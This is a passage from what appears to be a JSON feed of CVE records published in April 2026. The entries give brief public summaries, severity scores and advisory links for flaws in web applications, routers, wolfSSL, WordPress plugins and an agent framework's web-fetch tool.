The impacted element is an unknown function of the file /util/VehicleDetailsFunction.php. The manipulation of the argument VEHICLE_ID results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/TAnNbR/CVE/issues/3","https://vuldb.com/submit/796201","https://vuldb.com/vuln/356617","https://vuldb.com/vuln/356617/cti"],"published_time":"2026-04-10T09:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33455","summary":"Livestatus injection in the monitoring quicksearch in Checkmk <2.5.0b4 allows an authenticated attacker to inject livestatus commands via the search query due to insufficient input sanitization in search filter plugins.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00042,"ranking_epss":0.12568,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://checkmk.com/werk/17988"],"published_time":"2026-04-10T09:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6035","summary":"A vulnerability has been found in code-projects Vehicle Showroom Management System 1.0. The affected element is an unknown function of the file /BranchManagement/ServiceAndSalesReport.php. The manipulation of the argument BRANCH_ID leads to cross site scripting. Remote exploitation of the attack is possible. 
The exploit has been disclosed to the public and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00033,"ranking_epss":0.09343,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/TAnNbR/CVE/issues/2","https://vuldb.com/submit/796200","https://vuldb.com/vuln/356616","https://vuldb.com/vuln/356616/cti"],"published_time":"2026-04-10T08:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5525","summary":"A stack-based buffer overflow vulnerability exists in Notepad++ version 8.9.3 in the file drop handler component. When a user drags and drops a directory path of exactly 259 characters without a trailing backslash, the application appends a backslash and null terminator without proper bounds checking, resulting in a stack buffer overflow and application crash (STATUS_STACK_BUFFER_OVERRUN).","cvss":6.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.0,"cvss_v4":null,"epss":0.00011,"ranking_epss":0.01367,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/notepad-plus-plus/notepad-plus-plus/commit/bfe7514d68bc559534c046c4ef2d1865267aa2b0","https://github.com/notepad-plus-plus/notepad-plus-plus/issues/17921","https://github.com/notepad-plus-plus/notepad-plus-plus/pull/17930","https://github.com/notepad-plus-plus/notepad-plus-plus/issues/17921"],"published_time":"2026-04-10T08:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6031","summary":"A vulnerability has been found in code-projects Simple IT Discussion Forum 1.0. This affects an unknown function of the file /add-category-function.php. Such manipulation of the argument Category leads to sql injection. The attack can be executed remotely. 
The exploit has been disclosed to the public and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/GeekShuo/None/issues/2","https://vuldb.com/submit/795486","https://vuldb.com/vuln/356607","https://vuldb.com/vuln/356607/cti"],"published_time":"2026-04-10T08:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6032","summary":"A vulnerability was found in code-projects Simple Laundry System 1.0. This impacts an unknown function of the file /checkcheckout.php. Performing a manipulation of the argument serviceId results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00033,"ranking_epss":0.09343,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/GeekShuo/None/issues/1","https://vuldb.com/submit/795487","https://vuldb.com/vuln/356608","https://vuldb.com/vuln/356608/cti"],"published_time":"2026-04-10T08:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6033","summary":"A vulnerability was determined in CodeAstro Online Classroom 1.0. Affected is an unknown function of the file /updatedetailsfromstudent.php?eno=146891650. Executing a manipulation of the argument fname can lead to sql injection. The attack may be performed from remote. 
The exploit has been publicly disclosed and may be utilized.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://codeastro.com/","https://github.com/yuji0903/silver-guide/issues/17","https://vuldb.com/submit/795773","https://vuldb.com/vuln/356609","https://vuldb.com/vuln/356609/cti"],"published_time":"2026-04-10T08:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6034","summary":"A flaw has been found in code-projects Vehicle Showroom Management System 1.0. Impacted is an unknown function of the file /BranchManagement/ProfitAndLossReport.php. Executing a manipulation of the argument BRANCH_ID can lead to cross site scripting. The attack may be launched remotely. The exploit has been published and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00033,"ranking_epss":0.09343,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/TAnNbR/CVE/issues/1","https://vuldb.com/submit/796199","https://vuldb.com/vuln/356615","https://vuldb.com/vuln/356615/cti"],"published_time":"2026-04-10T08:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40212","summary":"OpenStack Skyline before 5.0.1, 6.0.0, and 7.0.0 has a DOM-based Cross-Site Scripting (XSS) vulnerability in the console because document.write is used unsafely, which is relevant in scenarios where administrators use the console web interface to view instance console 
logs.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://bugs.launchpad.net/skyline-console/+bug/2138575","https://review.opendev.org/973351","https://security.openstack.org/ossa/OSSA-2026-006.html","https://www.openwall.com/lists/oss-security/2026/04/09/30"],"published_time":"2026-04-10T08:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22750","summary":"When configuring SSL bundles in Spring Cloud Gateway by using the configuration property spring.ssl.bundle, the configuration was silently ignored and the default SSL configuration was used instead.\nNote: The 4.2.x branch is no longer under open source support. If you are using Spring Cloud Gateway 4.2.0 and are not an enterprise customer, you can upgrade to any Spring Cloud Gateway 4.2.x release newer than 4.2.0 available on Maven Central https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-gateway/ . Ideally if you are not an enterprise customer, you should be upgrading to 5.0.2 or 5.1.1 which are the current supported open source releases.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09851,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://spring.io/security/cve-2026-22750"],"published_time":"2026-04-10T08:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6029","summary":"A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The affected element is the function setVpnAccountCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument User results in os command injection. The attack may be launched remotely. 
The exploit is now public and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_174/README.md","https://vuldb.com/submit/792050","https://vuldb.com/vuln/356605","https://vuldb.com/vuln/356605/cti","https://www.totolink.net/"],"published_time":"2026-04-10T07:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6030","summary":"A flaw has been found in itsourcecode Construction Management System 1.0. The impacted element is an unknown function of the file /del1.php. This manipulation of the argument toolname causes sql injection. Remote exploitation of the attack is possible. The exploit has been published and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ltranquility/submit/issues/9","https://itsourcecode.com/","https://vuldb.com/submit/795444","https://vuldb.com/vuln/356606","https://vuldb.com/vuln/356606/cti"],"published_time":"2026-04-10T07:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-28704","summary":"Emocheck insecurely loads Dynamic Link Libraries (DLLs). 
If a crafted DLL file is placed to the same directory, an arbitrary code may be executed with the privilege of the user invoking EmoCheck.","cvss":8.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":8.4,"epss":0.00013,"ranking_epss":0.02003,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/JPCERTCC/EmoCheck/","https://jvn.jp/en/jp/JVN00263243/","https://www.jpcert.or.jp/press/2026/PR20260410.html"],"published_time":"2026-04-10T07:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4432","summary":"The YITH WooCommerce Wishlist WordPress plugin before 4.13.0 does not properly validate wishlist ownership in the save_title() AJAX handler before allowing wishlist renaming operations. The function only checks for a valid nonce, which is publicly exposed in the page source of the /wishlist/ page, making it possible for unauthenticated attackers to rename any wishlist belonging to any user on the site.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10541,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://wpscan.com/vulnerability/2f052086-b691-48df-9b08-2cb1db65e14e/"],"published_time":"2026-04-10T07:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6026","summary":"A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This vulnerability affects the function setPortalConfWeChat of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument enable results in os command injection. The attack can be initiated remotely. 
The exploit has been released to the public and may be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_171/README.md","https://vuldb.com/submit/792047","https://vuldb.com/vuln/356602","https://vuldb.com/vuln/356602/cti","https://www.totolink.net/"],"published_time":"2026-04-10T07:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6027","summary":"A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. This issue affects the function setUrlFilterRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument enable can lead to os command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_172/README.md","https://vuldb.com/submit/792048","https://vuldb.com/vuln/356603","https://vuldb.com/vuln/356603/cti","https://www.totolink.net/"],"published_time":"2026-04-10T07:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6028","summary":"A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Impacted is the function setPptpServerCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable leads to os command injection. The attack may be initiated remotely. 
The exploit has been disclosed publicly and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_173/README.md","https://vuldb.com/submit/792049","https://vuldb.com/vuln/356604","https://vuldb.com/vuln/356604/cti","https://www.totolink.net/"],"published_time":"2026-04-10T07:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1115","summary":"A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social feature of parisneo/lollms, affecting the latest version prior to 2.2.0. The vulnerability exists in the `create_post` function within `backend/routers/social/__init__.py`, where user-provided content is directly assigned to the `DBPost` model without sanitization. This allows attackers to inject and store malicious JavaScript, which is executed in the browsers of users viewing the Home Feed, including administrators. This can lead to account takeover, session hijacking, and wormable attacks. 
The issue is resolved in version 2.2.0.","cvss":9.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.6,"cvss_v4":null,"epss":0.00045,"ranking_epss":0.13571,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a","https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa","https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa"],"published_time":"2026-04-10T07:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-14545","summary":"The YML for Yandex Market WordPress plugin before 5.0.26 is vulnerable to Remote Code Execution via the feed generation process.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00079,"ranking_epss":0.23402,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a56fbc/"],"published_time":"2026-04-10T07:16:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6025","summary":"A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setSyslogCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument enable leads to os command injection. It is possible to launch the attack remotely. 
The exploit is publicly available and might be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_170/README.md","https://vuldb.com/submit/792046","https://vuldb.com/vuln/356601","https://vuldb.com/vuln/356601/cti","https://www.totolink.net/"],"published_time":"2026-04-10T06:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6015","summary":"A vulnerability has been found in Tenda AC9 15.03.02.13. Impacted is the function formQuickIndex of the file /goform/QuickIndex of the component POST Request Handler. Such manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/Tenda-AC9-QuickIndex-33153a41781f80458940f212f150a4fb?source=copy_link","https://vuldb.com/submit/791828","https://vuldb.com/vuln/356571","https://vuldb.com/vuln/356571/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6016","summary":"A vulnerability was found in Tenda AC9 15.03.02.13. The affected element is the function decodePwd of the file /goform/WizardHandle of the component POST Request Handler. Performing a manipulation of the argument WANS results in stack-based buffer overflow. The attack can be initiated remotely. 
The exploit has been made public and could be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/Tenda-AC9-WizardHandle-33153a41781f808480f9e3b78ce438e0?source=copy_link","https://vuldb.com/submit/791829","https://vuldb.com/vuln/356572","https://vuldb.com/vuln/356572/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6024","summary":"A vulnerability was determined in Tenda i6 1.0.0.7(2204). Affected by this issue is the function R7WebsSecurityHandlerfunction of the component HTTP Handler. This manipulation causes path traversal. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00062,"ranking_epss":0.19292,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/M3/vul_84/README.md","https://vuldb.com/submit/791826","https://vuldb.com/vuln/356600","https://vuldb.com/vuln/356600/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-10T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5477","summary":"An integer overflow existed in the wolfCrypt CMAC implementation that could be exploited to forge CMAC tags. The function wc_CmacUpdate used the guard `if (cmac->totalSz != 0)` to skip XOR-chaining on the first block (where digest is all-zeros and the XOR is a no-op). However, totalSz is word32 and wraps to zero after 2^28 block flushes (4 GiB), causing the guard to erroneously discard the live CBC-MAC chain state. Any two messages sharing a common suffix beyond the 4 GiB mark then produce identical CMAC tags, enabling a zero-work prefix-substitution forgery. 
The fix removes the guard, making the XOR unconditional; the no-op property on the first block is preserved because digest is zero-initialized by wc_InitCmac_ex.","cvss":8.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.2,"epss":0.00042,"ranking_epss":0.12712,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10102"],"published_time":"2026-04-10T06:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6012","summary":"A security vulnerability has been detected in D-Link DIR-513 1.10. This affects the function formSetPassword of the file /goform/formSetPassword of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-513-formSetPassword-33153a41781f806e9a3cf63a5a9091ac?source=copy_link","https://vuldb.com/submit/791858","https://vuldb.com/vuln/356568","https://vuldb.com/vuln/356568/cti","https://www.dlink.com/"],"published_time":"2026-04-10T05:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6013","summary":"A vulnerability was detected in D-Link DIR-513 1.10. This vulnerability affects the function formSetRoute of the file /goform/formSetRoute of the component POST Request Handler. The manipulation of the argument curTime results in buffer overflow. The attack may be performed from remote. The exploit is now public and may be used. 
This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-513-formSetRoute-33153a41781f80f7aed1d3614c199d85?source=copy_link","https://vuldb.com/submit/791859","https://vuldb.com/vuln/356569","https://vuldb.com/vuln/356569/cti","https://www.dlink.com/"],"published_time":"2026-04-10T05:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6014","summary":"A flaw has been found in D-Link DIR-513 1.10. This issue affects the function formAdvanceSetup of the file /goform/formAdvanceSetup of the component POST Request Handler. This manipulation of the argument webpage causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-513-formAdvanceSetup-33153a41781f80829d47ec9b86dd8abf?source=copy_link","https://vuldb.com/submit/791860","https://vuldb.com/vuln/356570","https://vuldb.com/vuln/356570/cti","https://www.dlink.com/"],"published_time":"2026-04-10T05:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6011","summary":"A weakness has been identified in OpenClaw up to 2026.1.26. Affected by this issue is some unknown functionality of the file src/agents/tools/web-fetch.ts of the component assertPublicHostname Handler. Executing a manipulation can lead to server-side request forgery. The attack can be executed remotely. This attack is characterized by high complexity. 
The exploitation is known to be difficult. The exploit has been made available to the public and could be used for attacks. Upgrading to version 2026.1.29 can resolve this issue. This patch is called b623557a2ec7e271bda003eb3ac33fbb2e218505. Upgrading the affected component is advised.","cvss":6.3,"cvss_version":4.0,"cvss_v2":5.1,"cvss_v3":5.6,"cvss_v4":6.3,"epss":0.00045,"ranking_epss":0.13689,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/","https://github.com/openclaw/openclaw/commit/b623557a2ec7e271bda003eb3ac33fbb2e218505#diff-06572a96a58dc510037d5efa622f9bec8519bc1beab13c9f251e97e657a9d4edR44","https://github.com/openclaw/openclaw/releases/tag/v2026.1.29","https://github.com/zast-ai/vulnerability-reports/blob/main/openclaw/ssrf.md","https://vuldb.com/submit/795224","https://vuldb.com/vuln/356567","https://vuldb.com/vuln/356567/cti"],"published_time":"2026-04-10T05:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4482","summary":"The installer certificate files in the …/bootstrap/common/ssl folder do not seem to have restricted permissions on Windows systems (users have read and execute access). For the client.key file in particular, this could potentially lead to exploits, as this exposes agent identity material to any locally authenticated standard user.","cvss":6.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.8,"epss":8e-05,"ranking_epss":0.00649,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.rapid7.com/insight/release-notes-2026-april/#improvements-and-fixes"],"published_time":"2026-04-10T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6010","summary":"A security flaw has been discovered in CodeAstro Online Classroom 1.0/2.php. Affected by this vulnerability is an unknown functionality of the file /OnlineClassroom/takeassessment2.php?exid=14. 
Performing a manipulation of the argument Q1 results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://codeastro.com/","https://github.com/xue-p123/vuldb-research/issues/2","https://vuldb.com/submit/794658","https://vuldb.com/vuln/356566","https://vuldb.com/vuln/356566/cti"],"published_time":"2026-04-10T04:17:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6006","summary":"A vulnerability has been found in code-projects Patient Record Management System 1.0. The impacted element is an unknown function of the file /edit_hpatient.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/1768161086/SQL_CVE_1.2/blob/main/sql_cve.pdf","https://vuldb.com/submit/794542","https://vuldb.com/vuln/356562","https://vuldb.com/vuln/356562/cti"],"published_time":"2026-04-10T04:17:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6007","summary":"A vulnerability was found in itsourcecode Construction Management System 1.0. This affects an unknown function of the file /del.php. The manipulation of the argument equipname results in sql injection. The attack can be launched remotely. 
The exploit has been made public and could be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ltranquility/submit/issues/8","https://itsourcecode.com/","https://vuldb.com/submit/794604","https://vuldb.com/vuln/356563","https://vuldb.com/vuln/356563/cti"],"published_time":"2026-04-10T04:17:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5500","summary":"wolfSSL's wc_PKCS7_DecodeAuthEnvelopedData() does not properly sanitize the AES-GCM authentication tag length received and has no lower bounds check. A man-in-the-middle can therefore truncate the mac field from 16 bytes to 1 byte, reducing the tag check from 2⁻¹²⁸ to 2⁻⁸.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.00133,"ranking_epss":0.32808,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10102"],"published_time":"2026-04-10T04:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5501","summary":"wolfSSL_X509_verify_cert in the OpenSSL compatibility layer accepts a certificate chain in which the leaf's signature is not checked, if the attacker supplies an untrusted intermediate with Basic Constraints `CA:FALSE` that is legitimately signed by a trusted root. An attacker who obtains any leaf certificate from a trusted CA (e.g. a free DV cert from Let's Encrypt) can forge a certificate for any subject name with any public key and arbitrary signature bytes, and the function returns `WOLFSSL_SUCCESS` / `X509_V_OK`. 
The native wolfSSL TLS handshake path (`ProcessPeerCerts`) is not susceptible and the issue is limited to applications using the OpenSSL compatibility API directly, which would include integrations of wolfSSL into nginx and haproxy.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.6,"epss":0.00023,"ranking_epss":0.0604,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10102"],"published_time":"2026-04-10T04:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6005","summary":"A flaw has been found in code-projects Patient Record Management System 1.0. The affected element is an unknown function of the file /hematology_print.php. Executing a manipulation of the argument hem_id can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/1768161086/SQL_CVE_1.0/blob/main/sql_cve.pdf","https://vuldb.com/submit/794536","https://vuldb.com/vuln/356561","https://vuldb.com/vuln/356561/cti"],"published_time":"2026-04-10T04:17:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5466","summary":"wolfSSL's ECCSI signature verifier `wc_VerifyEccsiHash` decodes the `r` and `s` scalars from the signature blob via `mp_read_unsigned_bin` with no check that they lie in `[1, q-1]`. 
A crafted forged signature could verify against any message for any identity, using only publicly-known constants.","cvss":7.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.6,"epss":0.00011,"ranking_epss":0.01426,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfssl/wolfssl/pull/10102"],"published_time":"2026-04-10T04:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5479","summary":"In wolfSSL's EVP layer, the ChaCha20-Poly1305 AEAD decryption path in wolfSSL_EVP_CipherFinal (and related EVP cipher finalization functions) fails to verify the authentication tag before returning plaintext to the caller. When an application uses the EVP API to perform ChaCha20-Poly1305 decryption, the implementation computes or accepts the tag but does not compare it against the expected value.","cvss":7.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.6,"epss":7e-05,"ranking_epss":0.00506,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10102"],"published_time":"2026-04-10T04:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5188","summary":"An integer underflow issue exists in wolfSSL when parsing the Subject Alternative Name (SAN) extension of X.509 certificates. A malformed certificate can specify an entry length larger than the enclosing sequence, causing the internal length counter to wrap during parsing. This results in incorrect handling of certificate data. 
The issue is limited to configurations using the original ASN.1 parsing implementation which is off by default.","cvss":2.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.3,"epss":0.00028,"ranking_epss":0.07727,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10024"],"published_time":"2026-04-10T04:17:15","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2305","summary":"The AddFunc Head & Footer Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `aFhfc_head_code`, `aFhfc_body_code`, and `aFhfc_footer_code` post meta values in all versions up to, and including, 2.3. This is due to the plugin outputting these meta values without any sanitization or escaping. While the plugin restricts its own metabox and save handler to administrators via `current_user_can('manage_options')`, it does not use `register_meta()` with an `auth_callback` to protect these meta keys. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts via the WordPress Custom Fields interface that execute when an administrator previews or views the 
